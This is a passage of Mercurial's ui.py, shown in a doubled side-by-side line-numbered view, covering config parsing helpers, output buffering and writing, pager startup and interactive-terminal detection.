707 ):
708 """parse a configuration element with a conversion function
709
710 >>> u = ui(); s = b'foo'
711 >>> u.setconfig(s, b'float1', b'42')
712 >>> u.configwith(float, s, b'float1')
713 42.0
714 >>> u.setconfig(s, b'float2', b'-4.25')
715 >>> u.configwith(float, s, b'float2')
716 -4.25
717 >>> u.configwith(float, s, b'unknown', 7)
718 7.0
719 >>> u.setconfig(s, b'invalid', b'somevalue')
720 >>> u.configwith(float, s, b'invalid')
721 Traceback (most recent call last):
722 ...
723 ConfigError: foo.invalid is not a valid float ('somevalue')
724 >>> u.configwith(float, s, b'invalid', desc=b'womble')
725 Traceback (most recent call last):
726 ...
727 ConfigError: foo.invalid is not a valid womble ('somevalue')
728 """
729
730 v = self.config(section, name, default, untrusted)
731 if v is None:
732 return v # do not attempt to convert None
733 try:
734 return convert(v)
735 except (ValueError, error.ParseError):
736 if desc is None:
737 desc = pycompat.sysbytes(convert.__name__)
738 raise error.ConfigError(
739 _(b"%s.%s is not a valid %s ('%s')") % (section, name, desc, v)
740 )
741
742 def configint(self, section, name, default=_unset, untrusted=False):
743 """parse a configuration element as an integer
744
745 >>> u = ui(); s = b'foo'
746 >>> u.setconfig(s, b'int1', b'42')
747 >>> u.configint(s, b'int1')
748 42
749 >>> u.setconfig(s, b'int2', b'-42')
750 >>> u.configint(s, b'int2')
751 -42
752 >>> u.configint(s, b'unknown', 7)
753 7
754 >>> u.setconfig(s, b'invalid', b'somevalue')
755 >>> u.configint(s, b'invalid')
756 Traceback (most recent call last):
757 ...
758 ConfigError: foo.invalid is not a valid integer ('somevalue')
759 """
760
761 return self.configwith(
762 int, section, name, default, b'integer', untrusted
763 )
764
765 def configbytes(self, section, name, default=_unset, untrusted=False):
766 """parse a configuration element as a quantity in bytes
767
768 Units can be specified as b (bytes), k or kb (kilobytes), m or
769 mb (megabytes), g or gb (gigabytes).
770
771 >>> u = ui(); s = b'foo'
772 >>> u.setconfig(s, b'val1', b'42')
773 >>> u.configbytes(s, b'val1')
774 42
775 >>> u.setconfig(s, b'val2', b'42.5 kb')
776 >>> u.configbytes(s, b'val2')
777 43520
778 >>> u.configbytes(s, b'unknown', b'7 MB')
779 7340032
780 >>> u.setconfig(s, b'invalid', b'somevalue')
781 >>> u.configbytes(s, b'invalid')
782 Traceback (most recent call last):
783 ...
784 ConfigError: foo.invalid is not a byte quantity ('somevalue')
785 """
786
787 value = self._config(section, name, default, untrusted)
788 if value is _unset:
789 if default is _unset:
790 default = 0
791 value = default
792 if not isinstance(value, bytes):
793 return value
794 try:
795 return util.sizetoint(value)
796 except error.ParseError:
797 raise error.ConfigError(
798 _(b"%s.%s is not a byte quantity ('%s')")
799 % (section, name, value)
800 )
801
802 def configlist(self, section, name, default=_unset, untrusted=False):
803 """parse a configuration element as a list of comma/space separated
804 strings
805
806 >>> u = ui(); s = b'foo'
807 >>> u.setconfig(s, b'list1', b'this,is "a small" ,test')
808 >>> u.configlist(s, b'list1')
809 ['this', 'is', 'a small', 'test']
810 >>> u.setconfig(s, b'list2', b'this, is "a small" , test ')
811 >>> u.configlist(s, b'list2')
812 ['this', 'is', 'a small', 'test']
813 """
814 # default is not always a list
815 v = self.configwith(
816 config.parselist, section, name, default, b'list', untrusted
817 )
818 if isinstance(v, bytes):
819 return config.parselist(v)
820 elif v is None:
821 return []
822 return v
823
824 def configdate(self, section, name, default=_unset, untrusted=False):
825 """parse a configuration element as a tuple of ints
826
827 >>> u = ui(); s = b'foo'
828 >>> u.setconfig(s, b'date', b'0 0')
829 >>> u.configdate(s, b'date')
830 (0, 0)
831 """
832 if self.config(section, name, default, untrusted):
833 return self.configwith(
834 dateutil.parsedate, section, name, default, b'date', untrusted
835 )
836 if default is _unset:
837 return None
838 return default
839
840 def configdefault(self, section, name):
841 """returns the default value of the config item"""
842 item = self._knownconfig.get(section, {}).get(name)
843 itemdefault = None
844 if item is not None:
845 if callable(item.default):
846 itemdefault = item.default()
847 else:
848 itemdefault = item.default
849 return itemdefault
850
851 def hasconfig(self, section, name, untrusted=False):
852 return self._data(untrusted).hasitem(section, name)
853
854 def has_section(self, section, untrusted=False):
855 '''tell whether section exists in config.'''
856 return section in self._data(untrusted)
857
858 def configitems(self, section, untrusted=False, ignoresub=False):
859 items = self._data(untrusted).items(section)
860 if ignoresub:
861 items = [i for i in items if b':' not in i[0]]
862 if self.debugflag and not untrusted and self._reportuntrusted:
863 for k, v in self._ucfg.items(section):
864 if self._tcfg.get(section, k) != v:
865 self.debug(
866 b"ignoring untrusted configuration option "
867 b"%s.%s = %s\n" % (section, k, v)
868 )
869 return items
870
871 def walkconfig(self, untrusted=False):
872 cfg = self._data(untrusted)
873 for section in cfg.sections():
874 for name, value in self.configitems(section, untrusted):
875 yield section, name, value
876
877 def plain(self, feature=None):
878 '''is plain mode active?
879
880 Plain mode means that all configuration variables which affect
881 the behavior and output of Mercurial should be
882 ignored. Additionally, the output should be stable,
883 reproducible and suitable for use in scripts or applications.
884
885 The only way to trigger plain mode is by setting either the
886 `HGPLAIN' or `HGPLAINEXCEPT' environment variables.
887
888 The return value can either be
889 - False if HGPLAIN is not set, or feature is in HGPLAINEXCEPT
890 - False if feature is disabled by default and not included in HGPLAIN
891 - True otherwise
892 '''
893 if (
894 b'HGPLAIN' not in encoding.environ
895 and b'HGPLAINEXCEPT' not in encoding.environ
896 ):
897 return False
898 exceptions = (
899 encoding.environ.get(b'HGPLAINEXCEPT', b'').strip().split(b',')
900 )
901 # TODO: add support for HGPLAIN=+feature,-feature syntax
902 if b'+strictflags' not in encoding.environ.get(b'HGPLAIN', b'').split(
903 b','
904 ):
905 exceptions.append(b'strictflags')
906 if feature and exceptions:
907 return feature not in exceptions
908 return True
909
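The logic above is driven entirely by the environment. A hedged sketch, mutating `encoding.environ` directly for illustration (the in-file doctests do not normally do this):

encoding.environ[b'HGPLAINEXCEPT'] = b'alias'
u.plain()             # True: plain mode is active
u.plain(b'alias')     # False: 'alias' is excepted, so [alias] survives
u.plain(b'template')  # True: templates are still suppressed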
910 def username(self, acceptempty=False):
911 """Return default username to be used in commits.
912
913 Searched in this order: $HGUSER, [ui] section of hgrcs, $EMAIL;
914 searching stops at the first of these that is set.
915 If not found and acceptempty is True, returns None.
916 If not found and ui.askusername is True, ask the user, else use
917 ($LOGNAME or $USER or $LNAME or $USERNAME) + "@full.hostname".
918 If no username could be found, raise an Abort error.
919 """
920 user = encoding.environ.get(b"HGUSER")
921 if user is None:
922 user = self.config(b"ui", b"username")
923 if user is not None:
924 user = os.path.expandvars(user)
925 if user is None:
926 user = encoding.environ.get(b"EMAIL")
927 if user is None and acceptempty:
928 return user
929 if user is None and self.configbool(b"ui", b"askusername"):
930 user = self.prompt(_(b"enter a commit username:"), default=None)
931 if user is None and not self.interactive():
932 try:
933 user = b'%s@%s' % (
934 procutil.getuser(),
935 encoding.strtolocal(socket.getfqdn()),
936 )
937 self.warn(_(b"no username found, using '%s' instead\n") % user)
938 except KeyError:
939 pass
940 if not user:
941 raise error.Abort(
942 _(b'no username supplied'),
943 hint=_(b"use 'hg config --edit' " b'to set your username'),
944 )
945 if b"\n" in user:
946 raise error.Abort(
947 _(b"username %r contains a newline\n") % pycompat.bytestr(user)
948 )
949 return user
950
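The usual way to satisfy the lookup above is the `[ui]` section of an hgrc (value illustrative):

[ui]
username = Jane Doe <jane@example.org>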
951 def shortuser(self, user):
952 """Return a short representation of a user name or email address."""
953 if not self.verbose:
954 user = stringutil.shortuser(user)
955 return user
956
957 def expandpath(self, loc, default=None):
958 """Return repository location relative to cwd or from [paths]"""
959 try:
960 p = self.paths.getpath(loc)
961 if p:
962 return p.rawloc
963 except error.RepoError:
964 pass
965
966 if default:
967 try:
968 p = self.paths.getpath(default)
969 if p:
970 return p.rawloc
971 except error.RepoError:
972 pass
973
974 return loc
975
976 @util.propertycache
977 def paths(self):
978 return paths(self)
979
980 @property
981 def fout(self):
982 return self._fout
983
984 @fout.setter
985 def fout(self, f):
986 self._fout = f
987 self._fmsgout, self._fmsgerr = _selectmsgdests(self)
988
989 @property
990 def ferr(self):
991 return self._ferr
992
993 @ferr.setter
994 def ferr(self, f):
995 self._ferr = f
996 self._fmsgout, self._fmsgerr = _selectmsgdests(self)
997
998 @property
999 def fin(self):
1000 return self._fin
1001
1002 @fin.setter
1003 def fin(self, f):
1004 self._fin = f
1005
1006 @property
1007 def fmsg(self):
1008 """Stream dedicated for status/error messages; may be None if
1009 fout/ferr are used"""
1010 return self._fmsg
1011
1012 @fmsg.setter
1013 def fmsg(self, f):
1014 self._fmsg = f
1015 self._fmsgout, self._fmsgerr = _selectmsgdests(self)
1016
1017 def pushbuffer(self, error=False, subproc=False, labeled=False):
1018 """install a buffer to capture standard output of the ui object
1019
1020 If error is True, the error output will be captured too.
1021
1022 If subproc is True, output from subprocesses (typically hooks) will be
1023 captured too.
1024
1025 If labeled is True, any labels associated with buffered
1026 output will be handled. By default, this has no effect
1027 on the output returned, but extensions and GUI tools may
1028 handle this argument and return styled output. If output
1029 is being buffered so it can be captured and parsed or
1030 processed, labeled should not be set to True.
1031 """
1032 self._buffers.append([])
1033 self._bufferstates.append((error, subproc, labeled))
1034 self._bufferapplylabels = labeled
1035
1036 def popbuffer(self):
1037 '''pop the last buffer and return the buffered output'''
1038 self._bufferstates.pop()
1039 if self._bufferstates:
1040 self._bufferapplylabels = self._bufferstates[-1][2]
1041 else:
1042 self._bufferapplylabels = None
1043
1044 return b"".join(self._buffers.pop())
1045
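A minimal sketch pairing the two methods above to capture output instead of printing it:

u.pushbuffer()
u.write(b'hello\n')
captured = u.popbuffer()   # b'hello\n'; nothing reached stdout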
1046 def _isbuffered(self, dest):
1047 if dest is self._fout:
1048 return bool(self._buffers)
1049 if dest is self._ferr:
1050 return bool(self._bufferstates and self._bufferstates[-1][0])
1051 return False
1052
1053 def canwritewithoutlabels(self):
1054 '''check if write skips the label'''
1055 if self._buffers and not self._bufferapplylabels:
1056 return True
1057 return self._colormode is None
1058
1059 def canbatchlabeledwrites(self):
1060 '''check if write calls with labels are batchable'''
1061 # Windows color printing is special, see ``write``.
1062 return self._colormode != b'win32'
1063
1064 def write(self, *args, **opts):
1065 '''write args to output
1066
1067 By default, this method simply writes to the buffer or stdout.
1068 Color mode can be set on the UI class to have the output decorated
1069 with color modifiers before being written to stdout.
1070
1071 The color used is controlled by an optional keyword argument, "label".
1072 This should be a string containing label names separated by space.
1073 Label names take the form of "topic.type". For example, ui.debug()
1074 issues a label of "ui.debug".
1075
1076 Progress reports via stderr are normally cleared before writing as
1077 stdout and stderr go to the same terminal. This can be skipped with
1078 the optional keyword argument "keepprogressbar". The progress bar
1079 will continue to occupy a partial line on stderr in that case.
1080 This functionality is intended for when Mercurial acts as a data
1081 source in a pipe.
1082
1083 When labeling output for a specific command, a label of
1084 "cmdname.type" is recommended. For example, status issues
1085 a label of "status.modified" for modified files.
1086 '''
1087 dest = self._fout
1088
1089 # inlined _write() for speed
1090 if self._buffers:
1091 label = opts.get('label', b'')
1092 if label and self._bufferapplylabels:
1093 self._buffers[-1].extend(self.label(a, label) for a in args)
1094 else:
1095 self._buffers[-1].extend(args)
1096 return
1097
1098 # inlined _writenobuf() for speed
1099 if not opts.get('keepprogressbar', False):
1100 self._progclear()
1101 msg = b''.join(args)
1102
1103 # opencode timeblockedsection because this is a critical path
1104 starttime = util.timer()
1105 try:
1106 if self._colormode == b'win32':
1107 # windows color printing is its own can of crab, defer to
1108 # the color module and that is it.
1109 color.win32print(self, dest.write, msg, **opts)
1110 else:
1111 if self._colormode is not None:
1112 label = opts.get('label', b'')
1113 msg = self.label(msg, label)
1114 dest.write(msg)
1115 except IOError as err:
1116 raise error.StdioError(err)
1117 finally:
1118 self._blockedtimes[b'stdio_blocked'] += (
1119 util.timer() - starttime
1120 ) * 1000
1121
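A sketch of labeled output as described in the docstring above; the label is one really emitted by `hg status`:

u.write(b'M modified-file.txt\n', label=b'status.modified')
# with color enabled, the line is wrapped in the effects mapped to
# 'status.modified'; without color, it is written verbatim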
1122 def write_err(self, *args, **opts):
1123 self._write(self._ferr, *args, **opts)
1124
1125 def _write(self, dest, *args, **opts):
1126 # update write() as well if you touch this code
1127 if self._isbuffered(dest):
1128 label = opts.get('label', b'')
1129 if label and self._bufferapplylabels:
1130 self._buffers[-1].extend(self.label(a, label) for a in args)
1131 else:
1132 self._buffers[-1].extend(args)
1133 else:
1134 self._writenobuf(dest, *args, **opts)
1135
1136 def _writenobuf(self, dest, *args, **opts):
1137 # update write() as well if you touch this code
1138 if not opts.get('keepprogressbar', False):
1139 self._progclear()
1140 msg = b''.join(args)
1141
1142 # opencode timeblockedsection because this is a critical path
1143 starttime = util.timer()
1144 try:
1145 if dest is self._ferr and not getattr(self._fout, 'closed', False):
1146 self._fout.flush()
1147 if getattr(dest, 'structured', False):
1148 # channel for machine-readable output with metadata, where
1149 # no extra colorization is necessary.
1150 dest.write(msg, **opts)
1151 elif self._colormode == b'win32':
1152 # windows color printing is its own can of crab, defer to
1153 # the color module and that is it.
1154 color.win32print(self, dest.write, msg, **opts)
1155 else:
1156 if self._colormode is not None:
1157 label = opts.get('label', b'')
1158 msg = self.label(msg, label)
1159 dest.write(msg)
1160 # stderr may be buffered under win32 when redirected to files,
1161 # including stdout.
1162 if dest is self._ferr and not getattr(self._ferr, 'closed', False):
1163 dest.flush()
1164 except IOError as err:
1165 if dest is self._ferr and err.errno in (
1166 errno.EPIPE,
1167 errno.EIO,
1168 errno.EBADF,
1169 ):
1170 # no way to report the error, so ignore it
1171 return
1172 raise error.StdioError(err)
1173 finally:
1174 self._blockedtimes[b'stdio_blocked'] += (
1175 util.timer() - starttime
1176 ) * 1000
1177
1178 def _writemsg(self, dest, *args, **opts):
1179 _writemsgwith(self._write, dest, *args, **opts)
1180
1181 def _writemsgnobuf(self, dest, *args, **opts):
1182 _writemsgwith(self._writenobuf, dest, *args, **opts)
1183
1184 def flush(self):
1185 # opencode timeblockedsection because this is a critical path
1186 starttime = util.timer()
1187 try:
1188 try:
1189 self._fout.flush()
1190 except IOError as err:
1191 if err.errno not in (errno.EPIPE, errno.EIO, errno.EBADF):
1192 raise error.StdioError(err)
1193 finally:
1194 try:
1195 self._ferr.flush()
1196 except IOError as err:
1197 if err.errno not in (errno.EPIPE, errno.EIO, errno.EBADF):
1198 raise error.StdioError(err)
1199 finally:
1200 self._blockedtimes[b'stdio_blocked'] += (
1201 util.timer() - starttime
1202 ) * 1000
1203
1204 def _isatty(self, fh):
1205 if self.configbool(b'ui', b'nontty'):
1206 return False
1207 return procutil.isatty(fh)
1208
1209 def protectfinout(self):
1210 """Duplicate ui streams and redirect original if they are stdio
1211
1212 Returns (fin, fout) which point to the original ui fds, but may be
1213 copies of them. The returned streams can be considered "owned" in that
1214 print(), exec(), etc. never reach them.
1215 """
1216 if self._finoutredirected:
1217 # if already redirected, protectstdio() would just create another
1218 # nullfd pair, which is equivalent to returning self._fin/_fout.
1219 return self._fin, self._fout
1220 fin, fout = procutil.protectstdio(self._fin, self._fout)
1221 self._finoutredirected = (fin, fout) != (self._fin, self._fout)
1222 return fin, fout
1223
1224 def restorefinout(self, fin, fout):
1225 """Restore ui streams from possibly duplicated (fin, fout)"""
1226 if (fin, fout) == (self._fin, self._fout):
1227 return
1228 procutil.restorestdio(self._fin, self._fout, fin, fout)
1229 # protectfinout() won't create more than one pair of duplicated
1230 # streams, so we can just turn the redirection flag off.
1231 self._finoutredirected = False
1232
1233 @contextlib.contextmanager
1234 def protectedfinout(self):
1235 """Run code block with protected standard streams"""
1236 fin, fout = self.protectfinout()
1237 try:
1238 yield fin, fout
1239 finally:
1240 self.restorefinout(fin, fout)
1241
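A hedged sketch of the context manager above: write to the real stdio-backed streams directly while ui-level output is kept away from them for the duration of the block:

with u.protectedfinout() as (fin, fout):
    # fin/fout are the original streams; ui writes are redirected
    # elsewhere until the block exits
    fout.write(b'raw bytes straight to the original stdout\n')
    fout.flush()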
1242 def disablepager(self):
1243 self._disablepager = True
1244
1245 def pager(self, command):
1246 """Start a pager for subsequent command output.
1247
1248 Commands which produce a long stream of output should call
1249 this function to activate the user's preferred pagination
1250 mechanism (which may be no pager). Calling this function
1251 precludes any future use of interactive functionality, such as
1252 prompting the user or activating curses.
1253
1254 Args:
1255 command: The full, non-aliased name of the command. That is, "log"
1256 not "history", "summary" not "summ", etc.
1257 """
1258 if self._disablepager or self.pageractive:
1259 # whether to use a pager has already been decided
1260 return
1261
1262 if not command.startswith(b'internal-always-') and (
1263 # explicit --pager=on (= 'internal-always-' prefix) should
1264 # take precedence over disabling factors below
1265 command in self.configlist(b'pager', b'ignore')
1266 or not self.configbool(b'ui', b'paginate')
1267 or not self.configbool(b'pager', b'attend-' + command, True)
1268 or encoding.environ.get(b'TERM') == b'dumb'
1269 # TODO: if we want to allow HGPLAINEXCEPT=pager,
1270 # formatted() will need some adjustment.
1271 or not self.formatted()
1272 or self.plain()
1273 or self._buffers
1274 # TODO: expose debugger-enabled on the UI object
1275 or b'--debugger' in pycompat.sysargv
1276 ):
1277 # We only want to paginate if the ui appears to be
1278 # interactive, the user didn't say HGPLAIN or
1279 # HGPLAINEXCEPT=pager, and the user didn't specify --debug.
1280 return
1281
1282 pagercmd = self.config(b'pager', b'pager', rcutil.fallbackpager)
1283 if not pagercmd:
1284 return
1285
1286 pagerenv = {}
1287 for name, value in rcutil.defaultpagerenv().items():
1288 if name not in encoding.environ:
1289 pagerenv[name] = value
1290
1291 self.debug(
1292 b'starting pager for command %s\n' % stringutil.pprint(command)
1293 )
1294 self.flush()
1295
1296 wasformatted = self.formatted()
1297 if util.safehasattr(signal, b"SIGPIPE"):
1298 signal.signal(signal.SIGPIPE, _catchterm)
1299 if self._runpager(pagercmd, pagerenv):
1300 self.pageractive = True
1301 # Preserve the formatted-ness of the UI. This is important
1302 # because we mess with stdout, which might confuse
1303 # auto-detection of things being formatted.
1304 self.setconfig(b'ui', b'formatted', wasformatted, b'pager')
1305 self.setconfig(b'ui', b'interactive', False, b'pager')
1306
1307 # If pagermode differs from color.mode, reconfigure color now that
1308 # pageractive is set.
1309 cm = self._colormode
1310 if cm != self.config(b'color', b'pagermode', cm):
1311 color.setup(self)
1312 else:
1313 # If the pager can't be spawned in dispatch when --pager=on is
1314 # given, don't try again when the command runs, to avoid a duplicate
1315 # warning about a missing pager command.
1316 self.disablepager()
1317
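The knobs consulted above map to hgrc settings like the following (values illustrative):

[ui]
paginate = yes

[pager]
pager = less -FRX
# never page these commands
ignore = version, help
# or opt a single command out via attend-<command>
attend-log = no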
1318 def _runpager(self, command, env=None):
1318 def _runpager(self, command, env=None):
1319 """Actually start the pager and set up file descriptors.
1319 """Actually start the pager and set up file descriptors.
1320
1320
1321 This is separate in part so that extensions (like chg) can
1321 This is separate in part so that extensions (like chg) can
1322 override how a pager is invoked.
1322 override how a pager is invoked.
1323 """
1323 """
1324 if command == b'cat':
1324 if command == b'cat':
1325 # Save ourselves some work.
1325 # Save ourselves some work.
1326 return False
1326 return False
1327 # If the command doesn't contain any of these characters, we
1327 # If the command doesn't contain any of these characters, we
1328 # assume it's a binary and exec it directly. This means for
1328 # assume it's a binary and exec it directly. This means for
1329 # simple pager command configurations, we can degrade
1329 # simple pager command configurations, we can degrade
1330 # gracefully and tell the user about their broken pager.
1330 # gracefully and tell the user about their broken pager.
1331 shell = any(c in command for c in b"|&;<>()$`\\\"' \t\n*?[#~=%")
1331 shell = any(c in command for c in b"|&;<>()$`\\\"' \t\n*?[#~=%")
1332
1332
1333 if pycompat.iswindows and not shell:
1333 if pycompat.iswindows and not shell:
1334 # Windows' built-in `more` cannot be invoked with shell=False, but
1334 # Windows' built-in `more` cannot be invoked with shell=False, but
1335 # its `more.com` can. Hide this implementation detail from the
1335 # its `more.com` can. Hide this implementation detail from the
1336 # user so we can also get sane behavior for a bad PAGER setting. MSYS has
1336 # user so we can also get sane behavior for a bad PAGER setting. MSYS has
1337 # `more.exe`, so do a cmd.exe style resolution of the executable to
1337 # `more.exe`, so do a cmd.exe style resolution of the executable to
1338 # determine which one to use.
1338 # determine which one to use.
1339 fullcmd = procutil.findexe(command)
1339 fullcmd = procutil.findexe(command)
1340 if not fullcmd:
1340 if not fullcmd:
1341 self.warn(
1341 self.warn(
1342 _(b"missing pager command '%s', skipping pager\n") % command
1342 _(b"missing pager command '%s', skipping pager\n") % command
1343 )
1343 )
1344 return False
1344 return False
1345
1345
1346 command = fullcmd
1346 command = fullcmd
1347
1347
1348 try:
1348 try:
1349 pager = subprocess.Popen(
1349 pager = subprocess.Popen(
1350 procutil.tonativestr(command),
1350 procutil.tonativestr(command),
1351 shell=shell,
1351 shell=shell,
1352 bufsize=-1,
1352 bufsize=-1,
1353 close_fds=procutil.closefds,
1353 close_fds=procutil.closefds,
1354 stdin=subprocess.PIPE,
1354 stdin=subprocess.PIPE,
1355 stdout=procutil.stdout,
1355 stdout=procutil.stdout,
1356 stderr=procutil.stderr,
1356 stderr=procutil.stderr,
1357 env=procutil.tonativeenv(procutil.shellenviron(env)),
1357 env=procutil.tonativeenv(procutil.shellenviron(env)),
1358 )
1358 )
1359 except OSError as e:
1359 except OSError as e:
1360 if e.errno == errno.ENOENT and not shell:
1360 if e.errno == errno.ENOENT and not shell:
1361 self.warn(
1361 self.warn(
1362 _(b"missing pager command '%s', skipping pager\n") % command
1362 _(b"missing pager command '%s', skipping pager\n") % command
1363 )
1363 )
1364 return False
1364 return False
1365 raise
1365 raise
1366
1366
1367 # back up original file descriptors
1367 # back up original file descriptors
1368 stdoutfd = os.dup(procutil.stdout.fileno())
1368 stdoutfd = os.dup(procutil.stdout.fileno())
1369 stderrfd = os.dup(procutil.stderr.fileno())
1369 stderrfd = os.dup(procutil.stderr.fileno())
1370
1370
1371 os.dup2(pager.stdin.fileno(), procutil.stdout.fileno())
1371 os.dup2(pager.stdin.fileno(), procutil.stdout.fileno())
1372 if self._isatty(procutil.stderr):
1372 if self._isatty(procutil.stderr):
1373 os.dup2(pager.stdin.fileno(), procutil.stderr.fileno())
1373 os.dup2(pager.stdin.fileno(), procutil.stderr.fileno())
1374
1374
1375 @self.atexit
1375 @self.atexit
1376 def killpager():
1376 def killpager():
1377 if util.safehasattr(signal, b"SIGINT"):
1377 if util.safehasattr(signal, b"SIGINT"):
1378 signal.signal(signal.SIGINT, signal.SIG_IGN)
1378 signal.signal(signal.SIGINT, signal.SIG_IGN)
1379 # restore original fds, closing pager.stdin copies in the process
1379 # restore original fds, closing pager.stdin copies in the process
1380 os.dup2(stdoutfd, procutil.stdout.fileno())
1380 os.dup2(stdoutfd, procutil.stdout.fileno())
1381 os.dup2(stderrfd, procutil.stderr.fileno())
1381 os.dup2(stderrfd, procutil.stderr.fileno())
1382 pager.stdin.close()
1382 pager.stdin.close()
1383 pager.wait()
1383 pager.wait()
1384
1384
1385 return True
1385 return True
1386
1386
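# A minimal sketch of the shell-detection heuristic used in _runpager()
# above: a pager command is exec'd directly unless it contains shell
# metacharacters.  The character set is copied from the method; the sample
# commands below are illustrative only.
def _needs_shell(command):
    # mirrors `shell = any(c in command for c in ...)` in _runpager()
    return any(c in command for c in b"|&;<>()$`\\\"' \t\n*?[#~=%")

assert not _needs_shell(b'less')            # plain binary, exec'd directly
assert _needs_shell(b'less -FRX | head')    # space and '|' imply a shell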
1387 @property
1387 @property
1388 def _exithandlers(self):
1388 def _exithandlers(self):
1389 return _reqexithandlers
1389 return _reqexithandlers
1390
1390
1391 def atexit(self, func, *args, **kwargs):
1391 def atexit(self, func, *args, **kwargs):
1392 '''register a function to run after dispatching a request
1392 '''register a function to run after dispatching a request
1393
1393
1394 Handlers do not stay registered across request boundaries.'''
1394 Handlers do not stay registered across request boundaries.'''
1395 self._exithandlers.append((func, args, kwargs))
1395 self._exithandlers.append((func, args, kwargs))
1396 return func
1396 return func
1397
1397
1398 def interface(self, feature):
1398 def interface(self, feature):
1399 """what interface to use for interactive console features?
1399 """what interface to use for interactive console features?
1400
1400
1401 The interface is controlled by the value of `ui.interface` but also by
1401 The interface is controlled by the value of `ui.interface` but also by
1402 the value of feature-specific configuration. For example:
1402 the value of feature-specific configuration. For example:
1403
1403
1404 ui.interface.histedit = text
1404 ui.interface.histedit = text
1405 ui.interface.chunkselector = curses
1405 ui.interface.chunkselector = curses
1406
1406
1407 Here the features are "histedit" and "chunkselector".
1407 Here the features are "histedit" and "chunkselector".
1408
1408
1409 The configuration above means that the default interface for commands
1409 The configuration above means that the default interface for commands
1410 is curses, the interface for histedit is text, and the interface for
1410 is curses, the interface for histedit is text, and the interface for
1411 selecting chunks is crecord (the best curses interface available).
1411 selecting chunks is crecord (the best curses interface available).
1412
1412
1413 Consider the following example:
1413 Consider the following example:
1414 ui.interface = curses
1414 ui.interface = curses
1415 ui.interface.histedit = text
1415 ui.interface.histedit = text
1416
1416
1417 Then histedit will use the text interface and chunkselector will use
1417 Then histedit will use the text interface and chunkselector will use
1418 the default curses interface (crecord at the moment).
1418 the default curses interface (crecord at the moment).
1419 """
1419 """
1420 alldefaults = frozenset([b"text", b"curses"])
1420 alldefaults = frozenset([b"text", b"curses"])
1421
1421
1422 featureinterfaces = {
1422 featureinterfaces = {
1423 b"chunkselector": [b"text", b"curses",],
1423 b"chunkselector": [b"text", b"curses",],
1424 b"histedit": [b"text", b"curses",],
1424 b"histedit": [b"text", b"curses",],
1425 }
1425 }
1426
1426
1427 # Feature-specific interface
1427 # Feature-specific interface
1428 if feature not in featureinterfaces.keys():
1428 if feature not in featureinterfaces.keys():
1429 # Programming error, not user error
1429 # Programming error, not user error
1430 raise ValueError(b"Unknown feature requested %s" % feature)
1430 raise ValueError(b"Unknown feature requested %s" % feature)
1431
1431
1432 availableinterfaces = frozenset(featureinterfaces[feature])
1432 availableinterfaces = frozenset(featureinterfaces[feature])
1433 if alldefaults > availableinterfaces:
1433 if alldefaults > availableinterfaces:
1434 # Programming error, not user error. We need a use case to
1434 # Programming error, not user error. We need a use case to
1435 # define the right thing to do here.
1435 # define the right thing to do here.
1436 raise ValueError(
1436 raise ValueError(
1437 b"Feature %s does not handle all default interfaces" % feature
1437 b"Feature %s does not handle all default interfaces" % feature
1438 )
1438 )
1439
1439
1440 if self.plain() or encoding.environ.get(b'TERM') == b'dumb':
1440 if self.plain() or encoding.environ.get(b'TERM') == b'dumb':
1441 return b"text"
1441 return b"text"
1442
1442
1443 # Default interface for all the features
1443 # Default interface for all the features
1444 defaultinterface = b"text"
1444 defaultinterface = b"text"
1445 i = self.config(b"ui", b"interface")
1445 i = self.config(b"ui", b"interface")
1446 if i in alldefaults:
1446 if i in alldefaults:
1447 defaultinterface = i
1447 defaultinterface = i
1448
1448
1449 choseninterface = defaultinterface
1449 choseninterface = defaultinterface
1450 f = self.config(b"ui", b"interface.%s" % feature)
1450 f = self.config(b"ui", b"interface.%s" % feature)
1451 if f in availableinterfaces:
1451 if f in availableinterfaces:
1452 choseninterface = f
1452 choseninterface = f
1453
1453
1454 if i is not None and defaultinterface != i:
1454 if i is not None and defaultinterface != i:
1455 if f is not None:
1455 if f is not None:
1456 self.warn(_(b"invalid value for ui.interface: %s\n") % (i,))
1456 self.warn(_(b"invalid value for ui.interface: %s\n") % (i,))
1457 else:
1457 else:
1458 self.warn(
1458 self.warn(
1459 _(b"invalid value for ui.interface: %s (using %s)\n")
1459 _(b"invalid value for ui.interface: %s (using %s)\n")
1460 % (i, choseninterface)
1460 % (i, choseninterface)
1461 )
1461 )
1462 if f is not None and choseninterface != f:
1462 if f is not None and choseninterface != f:
1463 self.warn(
1463 self.warn(
1464 _(b"invalid value for ui.interface.%s: %s (using %s)\n")
1464 _(b"invalid value for ui.interface.%s: %s (using %s)\n")
1465 % (feature, f, choseninterface)
1465 % (feature, f, choseninterface)
1466 )
1466 )
1467
1467
1468 return choseninterface
1468 return choseninterface
1469
1469
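# A minimal sketch of the feature-interface resolution described in
# interface() above, assuming Mercurial is importable as a library and that
# neither HGPLAIN nor a dumb terminal forces the text interface.  The config
# values are illustrative examples.
from mercurial import ui as uimod

myui = uimod.ui.load()
myui.setconfig(b'ui', b'interface', b'curses', b'example')
myui.setconfig(b'ui', b'interface.histedit', b'text', b'example')

print(myui.interface(b'histedit'))       # b'text' (feature override)
print(myui.interface(b'chunkselector'))  # b'curses' (global default)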
1470 def interactive(self):
1470 def interactive(self):
1471 '''is interactive input allowed?
1471 '''is interactive input allowed?
1472
1472
1473 An interactive session is a session where input can be reasonably read
1473 An interactive session is a session where input can be reasonably read
1474 from `sys.stdin'. If this function returns false, any attempt to read
1474 from `sys.stdin'. If this function returns false, any attempt to read
1475 from stdin should fail with an error, unless a sensible default has been
1475 from stdin should fail with an error, unless a sensible default has been
1476 specified.
1476 specified.
1477
1477
1478 Interactiveness is triggered by the value of the `ui.interactive'
1478 Interactiveness is triggered by the value of the `ui.interactive'
1479 configuration variable or - if it is unset - when `sys.stdin' points
1479 configuration variable or - if it is unset - when `sys.stdin' points
1480 to a terminal device.
1480 to a terminal device.
1481
1481
1482 This function refers to input only; for output, see `ui.formatted()'.
1482 This function refers to input only; for output, see `ui.formatted()'.
1483 '''
1483 '''
1484 i = self.configbool(b"ui", b"interactive")
1484 i = self.configbool(b"ui", b"interactive")
1485 if i is None:
1485 if i is None:
1486 # some environments replace stdin without implementing isatty
1486 # some environments replace stdin without implementing isatty
1487 # usually those are non-interactive
1487 # usually those are non-interactive
1488 return self._isatty(self._fin)
1488 return self._isatty(self._fin)
1489
1489
1490 return i
1490 return i
1491
1491
1492 def termwidth(self):
1492 def termwidth(self):
1493 '''how wide is the terminal in columns?
1493 '''how wide is the terminal in columns?
1494 '''
1494 '''
1495 if b'COLUMNS' in encoding.environ:
1495 if b'COLUMNS' in encoding.environ:
1496 try:
1496 try:
